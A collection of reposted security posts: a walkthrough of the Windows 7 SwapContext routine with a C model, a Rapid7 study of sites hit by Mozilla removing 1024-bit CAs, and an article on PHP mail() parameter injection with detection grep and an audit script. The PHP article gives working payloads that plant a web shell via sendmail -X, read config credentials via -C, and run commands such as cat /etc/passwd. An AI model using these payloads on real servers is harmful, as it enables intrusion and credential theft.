1 - The first thing SwapContext does is verify that the new thread isn't actually running; this only matters on a multiprocessor system, where another processor might actually be running the thread. If the new thread is running, SwapContext just loops until the thread stops running. The boolean value checked is NewThread->Running, and after getting out of the loop, the Running boolean is immediately set to TRUE.
2 - The next thing SwapContext does is push the IRQL value supplied in ECX. To spoil a bit of what's coming in the next steps (step 13): SwapContext itself pops ECX later, but after the context switch. As a result, we'll be popping the new thread's pushed IRQL value (the stack has been switched).
3 - Interrupts are disabled, and the PRCB cycle time fields are updated with the value of the time-stamp counter. After the update, interrupts are enabled again.
4 - Increment the count of context switches in the PCR (Pcr->ContextSwitches++), and push Pcr->Used_ExceptionList, which is the first element of the PCR (fs:[0]). fs:[0] is actually a pointer to the last registered exception handling frame, which contains a pointer to the next frame and a pointer to the handling routine (similar to user mode); simply a singly linked list. Saving the exception list is important, as each thread has its own stack and thus its own exception handling list.
5 - OldThread->NpxState is tested; if it's non-NULL, SwapContext proceeds to save the floating-point registers and FPU-related data using the fxsave instruction. The location where this data is saved is in the initial stack, exactly at (initial stack pointer - 528 bytes). The fxsave output is 512 bytes long, so it's like pushing 512 bytes onto the initial stack; the other 16 bytes are for stack alignment, I suppose. The initial stack is discussed later, during step 8.
6 - Stack swapping: save the stack pointer in OldThread->KernelStack and load NewThread->KernelStack into ESP. We're now running on the new thread's stack; from now on, every value that we pop was pushed the last time the new thread was preparing for a context switch.
7 - Virtual address space swapping: the old thread's process is compared with the new thread's process. If they're different, the CR3 register (page directory pointer table register) is updated with the value of NewThread->ApcState.Process->DirectoryTableBase. As a result, the new thread will have access to a valid virtual address space. If the process is the same, CR3 is kept unchanged. The local descriptor table is also changed if the threads' processes are different.
8 - TSS Esp0 switching: even though I'll dedicate a future post to discussing the TSS (task state segment) in detail under Windows, a brief explanation is needed here. Windows uses only one TSS per processor and uses only the ESP0 and SS0 fields (another field is also used, but it is out of the scope of this article), which hold the kernel stack pointer and the kernel stack segment respectively. When a user-mode to kernel-mode transition must be done as a result of an interrupt, exception or system service call, as part of the transition ESP must be changed to point to the kernel stack; this kernel stack pointer is taken from the TSS's ESP0 field. Logically speaking, the ESP0 field of the TSS must be changed on every context switch to the kernel stack pointer of the new thread. In order to do so, SwapContext takes the kernel stack pointer at NewThread->InitialStack (InitialStack = StackBase - 0x30), subtracts the space it has used to save the floating-point registers using the fxsave instruction plus another 16 bytes for stack alignment, then stores the resulting stack pointer in the TSS's Esp0 field: pPcr->TssCopy.Esp0 (the TSS can also be accessed using the TR segment register).
9 - We've completed the context switch now, and the old thread can finally be marked as "stopped running" by setting the previously discussed boolean "Running" to FALSE: OldThread->Running = FALSE.
10 - If fxsave was previously executed by the new thread (the last time its context was switched out), the data saved by it (floating-point registers...) is loaded again using the xrstor instruction.
11 - Next, the TEB (thread environment block) pointer is updated in the PCR: pPcr->Used_Self = NewThread->Teb. So the Used_Self field of the PCR always points to the current thread's TEB.
12 - The new thread's context switch count is incremented (NewThread->ContextSwitches++).
13 - It's finally time to pop the two values that SwapContext pushed, the pointer to the exception list and the IRQL, from the new thread's stack. The saved IRQL value is restored into ECX, and the exception list pointer is popped into its field in the PCR.
14 - A check is done to see if the context switch was performed from a DPC routine (entering a wait state, for example), which is prohibited. If the pPrcb->DpcRoutineActive boolean is TRUE, this means the current processor is currently executing a DPC routine, and SwapContext will immediately call KeBugCheck, which will show a BSOD: ATTEMPTED_SWITCH_FROM_DPC.
15 - This is the step where the IRQL value (NewThread->WaitIrql) stored in ECX comes into use. As mentioned earlier, SwapContext returns a boolean value telling the caller whether it has to deliver any pending APCs. During this step SwapContext checks the new thread's ApcState to see if there are any kernel APCs pending. If there are, a second check is performed to see if special kernel APCs are disabled. If they're not disabled, ECX is tested to see if it's PASSIVE_LEVEL; if it is above PASSIVE_LEVEL, an APC_LEVEL software interrupt is requested and the function returns FALSE. Actually, the only case in which SwapContext returns TRUE is if ECX is equal to PASSIVE_LEVEL, so the caller will proceed to lower the IRQL to APC_LEVEL first to call KiDeliverApc, and then lower it to PASSIVE_LEVEL afterwards.

Special case: This special case is actually about the IRQL value supplied to SwapContext in ECX. The nature of this value depends on whether the caller will lower the IRQL immediately upon returning from SwapContext or not. Let's take two examples: the KiQuantumEnd and KiExitDispatcher routines (KiQuantumEnd is the special case). If you disassemble KiExitDispatcher, you'll notice that before calling KiSwapContext it stores the OldIrql (before it was raised to DISPATCH_LEVEL) in the WaitIrql of the old thread, so when the thread gains execution again at a later time, SwapContext will decide whether there are any APCs to deliver or not. KiExitDispatcher makes use of the return value of KiSwapContext (KiSwapContext returns the same value returned by SwapContext) to lower the IRQL (see the last sentence of step 15). However, by disassembling KiQuantumEnd you'll see that it stores APC_LEVEL in the old thread's WaitIrql without caring at which IRQL the thread was running before. If you refer back to the flowchart in my previous article, you'll see that KiQuantumEnd always ensures that SwapContext returns FALSE. First of all, KiQuantumEnd was called as a result of calling KiDispatchInterrupt, which is meant to be called when a DISPATCH_LEVEL software interrupt was requested. Thus, KiDispatchInterrupt was called by HalpDispatchSoftwareInterrupt, which is normally called by HalpCheckForSoftwareInterrupt. HalpDispatchSoftwareInterrupt is the function responsible for raising the IRQL to the software interrupt level (APC_LEVEL or DISPATCH_LEVEL), and upon returning from it HalpCheckForSoftwareInterrupt restores the IRQL to its original value (OldIrql). So the reason KiQuantumEnd doesn't care about the KiSwapContext return value is that it won't proceed to lower the IRQL (not its responsibility) nor to deliver any APCs; that's why it supplies APC_LEVEL as the old IRQL value to SwapContext, so that it returns FALSE. However, a software interrupt might still be requested by SwapContext if there are any pending APCs. KiDispatchInterrupt, which calls SwapContext directly, uses the same approach as KiQuantumEnd; instead of storing the value in OldThread->WaitIrql, it just moves it into ECX.

Post notes:
- Based on Windows 7 32-bit :>
- For any questions or suggestions feel free to leave a comment below or send me an email: souhail.hammou@outlook.com

See you again soon
-Souhail

Source: Reverse Engineering 0x4 Fun: Windows Internals - A look into SwapContext routine
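To make the push-then-pop-across-the-stack-switch bookkeeping (steps 2, 4, 6 and 13), the DPC check (step 14), the APC return value (step 15) and the KiQuantumEnd special case concrete, here is an added single-CPU C model; it is an illustration written for this page, not Windows source or the article author's code, and the KTHREAD/KPCR stand-ins, the 0xA000/0xB000 exception-list values and the scenario threads A and B are constructed assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>
/* Added single-CPU model (not Windows code) of the SwapContext steps above. */
typedef uint8_t KIRQL;
enum { PASSIVE_LEVEL = 0, APC_LEVEL = 1, DISPATCH_LEVEL = 2 };
#define STACK_WORDS 32

typedef struct {                   /* only the KTHREAD fields the steps touch */
    uint32_t  stack[STACK_WORDS];
    uint32_t *kernel_stack;        /* KernelStack: saved ESP, grows downward */
    KIRQL     wait_irql;           /* WaitIrql */
    bool      kernel_apc_pending;  /* ApcState.KernelApcPending */
    bool      special_apc_disable; /* SpecialApcDisable */
    bool      running;             /* Running */
    uint32_t  context_switches;
} KTHREAD;

typedef struct {                   /* the KPCR/KPRCB fields the steps touch */
    KTHREAD *current_thread;       /* set by the caller, never by SwapContext */
    uint32_t used_exception_list;  /* Used_ExceptionList, i.e. fs:[0] */
    uint32_t context_switches;
    bool     dpc_routine_active;   /* Prcb->DpcRoutineActive */
    bool     apc_interrupt_requested; /* an APC_LEVEL software interrupt was requested */
    bool     bugchecked;           /* stands in for KeBugCheck(ATTEMPTED_SWITCH_FROM_DPC) */
} KPCR;
static void push(KTHREAD *t, uint32_t v) { *--t->kernel_stack = v; }
static uint32_t pop(KTHREAD *t) { return *t->kernel_stack++; }

/* A thread that has never run needs an initial frame shaped like what step 13
 * pops: IRQL pushed first (as in step 2), exception list second (as in step 4). */
void kthread_init(KTHREAD *t, uint32_t exception_list, KIRQL first_irql) {
    memset(t, 0, sizeof *t);
    t->kernel_stack = t->stack + STACK_WORDS;
    push(t, first_irql);
    push(t, exception_list);
}

/* Make t the thread the CPU is already executing: its frame is already consumed. */
void kthread_make_current(KPCR *pcr, KTHREAD *t) {
    pcr->used_exception_list = pop(t);
    (void)pop(t);
    t->running = true;
    pcr->current_thread = t;
}

/* SwapContext(ESI = next, EDI = old, ECX = irql). Returns TRUE only when the
 * caller must lower to APC_LEVEL and deliver the new thread's kernel APCs. */
bool swap_context(KPCR *pcr, KTHREAD *old, KTHREAD *next, KIRQL irql) {
    next->running = true;                    /* step 1 (nothing to spin on with one CPU) */
    push(old, irql);                         /* step 2: pushed onto the OLD stack */
    pcr->context_switches++;                 /* step 4 */
    push(old, pcr->used_exception_list);
    /* step 6: ESP becomes next->KernelStack; in this model that means we pop from next */
    old->running = false;                    /* step 9 */
    next->context_switches++;                /* step 12 */
    pcr->used_exception_list = pop(next);    /* step 13: the NEXT thread's saved frame */
    KIRQL next_irql = (KIRQL)pop(next);
    if (pcr->dpc_routine_active) {           /* step 14 */
        pcr->bugchecked = true;
        return false;
    }
    if (next->kernel_apc_pending && !next->special_apc_disable) {   /* step 15 */
        if (next_irql == PASSIVE_LEVEL) return true;
        pcr->apc_interrupt_requested = true; /* above PASSIVE_LEVEL: request APC_LEVEL */
    }
    return false;
}

/* The caller's housekeeping from note 4: KiExitDispatcher passes the real old
 * IRQL, KiQuantumEnd passes APC_LEVEL so the thread's resume returns FALSE. */
bool ki_swap_context(KPCR *pcr, KTHREAD *next, KIRQL old_irql) {
    KTHREAD *old = pcr->current_thread;
    old->wait_irql = old_irql;
    pcr->current_thread = next;
    return swap_context(pcr, old, next, old->wait_irql);
}

typedef struct { bool deliver_on_b, deliver_on_a, apc_interrupt, bugcheck; uint32_t fs0_on_a; } Outcome;
/* Worked scenario on constructed values: A (running, kernel APC pending) is
 * preempted at quantum end; B has a kernel APC pending and a PASSIVE_LEVEL frame. */
Outcome run_scenario(void) {
    KPCR pcr = {0};
    KTHREAD a, b;
    Outcome o = {0};
    kthread_init(&a, 0xA000, PASSIVE_LEVEL);
    kthread_make_current(&pcr, &a);
    kthread_init(&b, 0xB000, PASSIVE_LEVEL);
    a.kernel_apc_pending = b.kernel_apc_pending = true;
    o.deliver_on_b = ki_swap_context(&pcr, &b, APC_LEVEL);      /* KiQuantumEnd style: TRUE */
    o.deliver_on_a = ki_swap_context(&pcr, &a, PASSIVE_LEVEL);  /* KiExitDispatcher style: FALSE */
    o.apc_interrupt = pcr.apc_interrupt_requested;  /* A came back with APC_LEVEL: interrupt instead */
    o.fs0_on_a = pcr.used_exception_list;           /* A's own exception list (0xA000) is restored */
    pcr.dpc_routine_active = true;                  /* switching while a DPC runs must bugcheck */
    ki_swap_context(&pcr, &b, PASSIVE_LEVEL);
    o.bugcheck = pcr.bugchecked;
    return o;
}
```

The second switch is the special case from the text: A was parked with APC_LEVEL in its WaitIrql, so on resume SwapContext returns FALSE and only requests the APC_LEVEL software interrupt, while B, parked with PASSIVE_LEVEL, gets TRUE and its caller delivers the APC itself.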
 - 
[h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h] @PhysicalDrive0

Source: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com
 - 
The company is very large and reputable, not a small-time outfit. I recommend it to those with experience.
 - 
[h=1]107,000 web sites no longer trusted by Mozilla[/h]Posted by jnickel in Project Sonar on Sep 4, 2014 3:48:43 PM

Mozilla's Firefox and Thunderbird recently removed 1024-bit certificate authority (CA) certificates from their trusted store. This change was announced to the various certificate authorities in May of this year and shipped with Firefox 32 on September 2nd. This change was a long time coming, as the National Institute of Standards and Technology (NIST) recommended that 1024-bit RSA keys be deprecated in 2010 and disallowed after 2013. A blog post at http://kuix.de/blog provided a list of specific certificates that would no longer be trusted starting with Firefox 32. There is a little disagreement that 1024-bit RSA keys may be cracked today by adversaries with the resources of nation states. As technology marches on, the security of 1024-bit keys will continue to deteriorate and become accessible to operators of relatively small clusters of commodity hardware. In the case of a CA key, the successful factoring of the RSA primes would allow an adversary to sign any certificate just as the CA in question would. This would allow impersonation of any "secure" web site, so long as the software you use still trusts these keys. This is certainly a welcome change, but how many sites are going to be affected by the removal of these CA certificates, and how many of these sites have certificates that aren't due to expire anytime soon? Fortunately there is a means to answer these questions. In June of 2012, the University of Michigan began scanning the Internet and collecting SSL certificates from all sites that responded on port 443. At Rapid7, we started our own collection of certificates in September of 2013 as part of Project Sonar, and have been conducting weekly scans since. Both sets of scans record the entire certificate chain, including the intermediate CA keys that Mozilla recently removed from the trusted store.
We loaded approximately 150 scans into a Postgres database, resulting in over 65 million unique certificates, and started crunching the data. The first question we wanted to answer, which is how many sites are affected, was relatively easy to determine. We searched the certificate chain for each of the roughly 20 million web sites we index to check if the SHA1 hashes listed in the blog post are present in the signing chain. After several minutes Postgres listed 107,535 sites that are using a certificate signed by the soon-to-be untrusted CA certificates. That is a relatively large number of sites and represents roughly half a percent of all of the web sites in our database. The next question we wanted to explore was how long the 1024-bit CA key signed certificates would continue to be used. This proved to be informative and presents a clearer picture of the impact. We modified the first query and grouped the sites by the certificate expiration date, rounded to the start of the month. The monthly counts of affected sites, grouped by expiration date, demonstrated the full extent of the problem. The resultant data, shown in part in the graph below, makes it clear that the problem isn't nearly as bad as the initial numbers indicated, since a great many of the certificates have already expired and the rest will do so over the next year. Surprisingly, over 13,000 web sites presented a certificate that expired in July of this year. Digging into these, we found that almost all of these had been issued to Vodafone and expired on July 1st. These expired certificates still appear to be in use today. The graph below demonstrates that the majority of affected certificates have already expired and those that haven't expired are due to expire in the next year. We have excluded certificates from the graph that expired prior to 2013 for legibility. 
While Mozilla's decision will affect a few sites, most of those that are active and affected have already expired, and shouldn't be trusted on that basis alone. In summary, the repeal of trust for these certificates is a sound decision based upon NIST recommendations, and while it initially appeared that a great many sites would be affected, the majority of these sites either have expired certificates or a certificate that expires within the next year. We hope that Chrome and other browsers will also remove these certificates to remove the potential risk involved with these 1024-bit CA keys. Going forward, we are now tracking the certificates presented by SMTP, IMAP, and POP services, and will keep an eye on those as the data rolls in. If you still use a 1024-bit RSA key for any other purpose, such as a Secure Shell (SSH) or PGP, it is past time to consider those obsolete and start rolling out stronger keys, of at least 2048 bits, and using ECC-based keys where available. - Labs Sursa: https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla
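The two queries described in the post (find every site whose signing chain contains one of the removed CA fingerprints, then group the affected sites by the month their server certificate expires) can be reproduced on a small scale. The block below is an added example and is not Rapid7's or the Sonar project's code: it uses SQLite instead of Postgres, the chain rows are constructed, and the fingerprints in UNTRUSTED_CA_SHA1 are placeholders standing in for the real SHA1 list from the kuix.de post.

```python
import sqlite3

# Placeholder fingerprints standing in for the SHA1 hashes of the removed
# 1024-bit CA certificates (constructed; the real list is in the kuix.de post).
UNTRUSTED_CA_SHA1 = ("a" * 40, "b" * 40)

# Constructed scan rows, one per certificate in a site's chain:
# (site, depth, sha1, not_after). depth 0 is the server certificate,
# depth >= 1 are the signing CAs recorded together with the chain.
SAMPLE_CHAIN_ROWS = [
    ("site-a.test", 0, "1" * 40, "2014-07-01"),
    ("site-a.test", 1, "a" * 40, "2019-12-31"),
    ("site-b.test", 0, "2" * 40, "2015-02-15"),
    ("site-b.test", 1, "b" * 40, "2019-12-31"),
    ("site-c.test", 0, "3" * 40, "2015-02-20"),
    ("site-c.test", 1, "c" * 40, "2024-12-31"),  # CA not on the removed list
    ("site-d.test", 0, "4" * 40, "2014-07-01"),
    ("site-d.test", 1, "a" * 40, "2019-12-31"),
    ("site-e.test", 0, "5" * 40, "2016-01-01"),
    ("site-e.test", 1, "b" * 40, "2019-12-31"),
]


def load_scan(rows=SAMPLE_CHAIN_ROWS):
    """Load chain rows into an in-memory SQLite table (stand-in for Postgres)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE chain (site TEXT, depth INTEGER, sha1 TEXT, not_after TEXT)"
    )
    conn.executemany("INSERT INTO chain VALUES (?, ?, ?, ?)", rows)
    return conn


def _in_clause():
    # One bind marker per fingerprint, so the hashes are passed as parameters.
    return ",".join("?" * len(UNTRUSTED_CA_SHA1))


def affected_sites(conn):
    """Sites whose signing chain contains any removed CA fingerprint."""
    cur = conn.execute(
        f"SELECT DISTINCT site FROM chain WHERE depth > 0 "
        f"AND sha1 IN ({_in_clause()}) ORDER BY site",
        UNTRUSTED_CA_SHA1,
    )
    return [row[0] for row in cur]


def affected_by_expiry_month(conn, as_of):
    """Count affected sites by the month (YYYY-MM) their server certificate
    expires and flag months already in the past relative to as_of (YYYY-MM-DD).
    This mirrors the 'grouped by expiration date' query from the post."""
    cur = conn.execute(
        f"""
        SELECT substr(leaf.not_after, 1, 7) AS month, COUNT(*)
        FROM chain AS leaf
        WHERE leaf.depth = 0
          AND EXISTS (SELECT 1 FROM chain AS ca
                      WHERE ca.site = leaf.site AND ca.depth > 0
                        AND ca.sha1 IN ({_in_clause()}))
        GROUP BY month
        ORDER BY month
        """,
        UNTRUSTED_CA_SHA1,
    )
    # A month sorts before the current month only once every day of it has passed.
    return [(month, n, month < as_of[:7]) for month, n in cur]


if __name__ == "__main__":
    db = load_scan()
    print("affected:", affected_sites(db))
    for month, n, expired in affected_by_expiry_month(db, "2014-09-04"):
        print(month, n, "expired" if expired else "still valid")
```

Matching on the CA's fingerprint rather than on its subject name is what makes the query robust: a renewed 2048-bit intermediate with the same subject gets a different hash and correctly drops out of the affected set.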
 - 
Exploit PHP's mail() to get remote code execution

September 3, 2014

While searching around the web for new nifty tricks I stumbled across this post about how to get remote code execution exploiting PHP's mail() function.

Update: After some further thinking and looking into this even more, I've found that my statement about this only being possible in really rare cases was wrong, since this can also be exploited in other scenarios which are much more common than I first thought. So, instead of removing content, I added a strike through on the statements that are no longer valid, and updated with a 2nd scenario explanation.

First, I must say that this is only going to happen under some really rare circumstances. Nevertheless, it's really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real life scenario later in this article. So, when that's said, let's have a look at what this is all about.

When using PHP to send emails we can use PHP's built in function mail(). This function takes a total of five parameters:

To
Subject
Message
Headers (Optional)
Parameters (Optional)

This looks pretty innocent at first glance, but if this is used wrong it can be really bad. The parameter of interest is the 5th and last one, so let's have a look at what the PHP manual has to say about it.

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.

This is really interesting. In short, this says that we can alter the behavior of the sendmail application.

Update: I should have added this from the beginning, but just to make this clear: the fifth argument is disabled when PHP is running in safe mode.

mail() In safe mode, the fifth parameter is disabled. (note: only affected since PHP 4.2.3)

Source: PHP: Functions restricted/disabled by safe mode - Manual

Now, let's have a look at the sendmail manual. I'm not going to post the entire manual here, but I will highlight some of the interesting parts.

Some interesting parameters

-O option=value
Set option option to the specified value. This form uses long names.

-Cfile
Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.

-X logfile
Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.

Some interesting options

QueueDirectory=queuedir
Select the directory in which to queue messages.

So how can this be exploited?

Remote Code Execution

As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the 5th parameter, which does not make sense at all that anyone would do it. But it's still something that really should be kept in mind by developers. With that said, let's just dive into it!

This is the code for exploiting the mail() function:

$to = 'a@b.c';
$subject = '<?php system($_GET["cmd"]); ?>';
$message = '';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php';
mail($to, $subject, $message, $headers, $options);

Let's inspect the logs from this. First let's have a look at what we can see in the browser by only going to the rce.php file:

11226 <<< To: a@b.c
11226 <<< Subject:
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<

Nothing really scary to see in this log. Now, let's use the cat command in the terminal on the same file:

> cat rce.php
11226 <<< To: a@b.c
11226 <<< Subject: <?php system($_GET["cmd"]); ?>
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<

See anything a bit more interesting?

Let's try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output:

11226 <<< To: a@b.c
11226 <<< Subject: total 20
drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 .
drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 ..
-rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php
-rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php
-rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php
11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php
11226 <<<
11226 <<<
11226 <<<
11226 <<< [EOF]

Now, let me break it down in case you don't fully understand the code. The first four variables are pretty straightforward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will be executing our commands on the system, followed by empty message and headers. Then the fifth variable is where the magic happens. The $options variable holds a string that will let us write our malicious code to the server and get remote code execution. First we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option. The reason why we want it there is because this is globally writable. Second, the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same. You will have to craft this to fit the target's file system.

If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now add the following query: ?cmd=[some command here]. For example http://example.com/rce.php?cmd=cat%20/etc/passwd. If you want you could also create a Local/Remote File Inclusion vulnerability as well. To do this, just change system() to include(). This can be handy if wget is not available, or you're not able to include a remote web shell.

It's also important to know that it's not only the subject field that can be used to inject arbitrary code. The content of all the fields, except the fifth, is written to the log.

Read files on the server

Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above. I have made a dummy configuration file just to show how it works:

$to = 'a@b.c';
$subject = '';
$message = '';
$headers = '';
$options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php';
mail($to, $subject, $message, $headers, $options);

This creates a file named evil.php with the following content:

11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php"
11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';"
11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';"
11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';"
11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';"
11124 >>> No local mailer defined

Now we have managed to extract very sensitive data, and there's a lot of other things we can extract from the server.

A real-life scenario where this can become a reality

Scenario #1: Admin panel

To be honest I actually had to think about this for a while. I mean, who would be so stupid that they let their users control the sendmail parameters? Well, it really doesn't have to be that stupid. So consider the following scenario. You have an admin panel for your website. Just like every other admin panel with respect for itself it lets you set different settings for sending emails. Stuff like port, smtp, etc. But not only that, this administration panel actually lets you monitor your mail logs, and you can decide where to store the logs.

Suddenly the idea of the values of the 5th parameter being controlled by an end user doesn't sound that stupid anymore. You would of course not let this be modified from the contact form. But admins wouldn't hack their own site, would they.. So in combination with other attacks that result in unauthorized access, this can become a real threat since you can actually create vulnerabilities that were not originally in the application.

Scenario #2: Email service

The idea around this scenario spawned from the original post linked to in the beginning of the article. So, let's consider we are running a website where a person can send an email to a recipient. In this case, the user must manually set the from address. Now, in the code we use the -f argument along with the user-inputted from address. Now if this from field is poorly validated and sanitized the user can continue writing the required arguments and values directly.

How to detect a possible vulnerability

The fastest way to detect any possibility for this in code is to use Linux's grep command, and recursively look for any use of mail() with all 5 parameters in use. Position yourself in the root of whatever project you want to check and execute the following command. This will return all code lines that use mail() with five parameters.

grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *

There will probably be some false positives, so if you have any suggestions to improve this to make it even more accurate, please let me know!

Summary

This is not something that you will stumble across often. To be honest I don't expect to ever see this in the wild at all, though it would be really cool to do so, but you never know as explained in the "real-life scenario" section.

Still, I do find this to be really interesting, and it makes you think "what other PHP functions can do this?" I hope you enjoyed the article and if you have any comments you know what to do

Sursa: Exploit PHP's mail() to get remote code execution | Security Sucks
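The grep in the article matches any line containing five comma-separated things inside mail(...), so it misses calls split across lines and flags commented-out code. The block below is an added example, not code from the article or from Security Sucks: a small audit script that finds every mail() call with a fifth argument, classifies that argument as a string literal (flags fixed by the developer) or a dynamic expression (must be traced back to its source, as in the admin-panel and -f scenarios), and a strict validator for the one legitimate user-supplied value in those scenarios, the envelope sender passed via -f. The PHP snippets in SAMPLE_SOURCES are constructed for the demonstration.

```python
import re

# Constructed PHP sources standing in for files the article's grep would hit
# (not real project code).
SAMPLE_SOURCES = {
    "contact.php": "mail($to, $subject, $message, $headers);\n",
    "admin/mailer.php": (
        "$options = '-f' . $_POST['from'];\n"
        "mail($to, $subject, $body, $headers, $options);\n"
    ),
    "cron/report.php": (
        "mail($to, $subject, $body,\n"
        "     $headers, '-fnoreply@example.test');\n"
    ),
    "lib/notes.php": "// mail($a, $b, $c, $d, $e) is documented elsewhere\n",
}

MAIL_CALL = re.compile(r"\bmail\s*\(")
STRING_LITERAL = re.compile(r"^(?:'[^']*'|\"[^\"]*\")$")
# Plain mailbox shape only: no whitespace, no leading '-', nothing sendmail
# could read as a further flag such as -X or -O.
ENVELOPE_ADDR = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def extract_call_args(src, open_paren):
    """Return the argument list of the call whose '(' is at open_paren, split on
    top-level commas; quoted strings and nested parentheses are respected."""
    depth, quote, args, cur = 0, None, [], []
    i = open_paren
    while i < len(src):
        ch = src[i]
        if quote:
            cur.append(ch)
            if ch == "\\" and i + 1 < len(src):
                i += 1
                cur.append(src[i])
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            cur.append(ch)
        elif ch == "(":
            depth += 1
            if depth > 1:
                cur.append(ch)
        elif ch == ")":
            depth -= 1
            if depth == 0:
                args.append("".join(cur).strip())
                return [a for a in args if a]
            cur.append(ch)
        elif ch == "," and depth == 1:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    return None  # unbalanced parentheses: give up on this call


def audit_mail_calls(sources=SAMPLE_SOURCES):
    """Find mail() calls with a fifth argument and classify that argument.

    Returns [(file, line, kind)] with kind 'literal' for a quoted string or
    'dynamic' for a variable or expression that needs manual review."""
    findings = []
    for name, src in sources.items():
        for m in MAIL_CALL.finditer(src):
            line_start = src.rfind("\n", 0, m.start()) + 1
            if src[line_start:m.start()].lstrip().startswith(("//", "#")):
                continue  # the call is commented out on this line
            args = extract_call_args(src, m.end() - 1)
            if not args or len(args) < 5:
                continue
            line = src.count("\n", 0, m.start()) + 1
            kind = "literal" if STRING_LITERAL.match(args[4]) else "dynamic"
            findings.append((name, line, kind))
    return findings


def is_safe_envelope_sender(address):
    """True only for an address that can be handed to sendmail's -f untouched."""
    return ENVELOPE_ADDR.match(address) is not None


def envelope_sender_flag(address):
    """Build the -f flag for the fifth mail() argument from a validated address."""
    if not is_safe_envelope_sender(address):
        raise ValueError("refusing to pass %r to sendmail" % address)
    return "-f" + address


if __name__ == "__main__":
    for finding in audit_mail_calls():
        print("%s:%d fifth argument is %s" % finding)
    print(envelope_sender_flag("noreply@example.test"))
```

A 'dynamic' finding is not a vulnerability by itself; it means the value has to be followed back to whoever can set it (a request parameter, an admin setting, a config file) before the call can be cleared. The validator is deliberately stricter than the full address grammar: rejecting unusual but valid addresses costs a support ticket, while accepting a space followed by another flag costs the server.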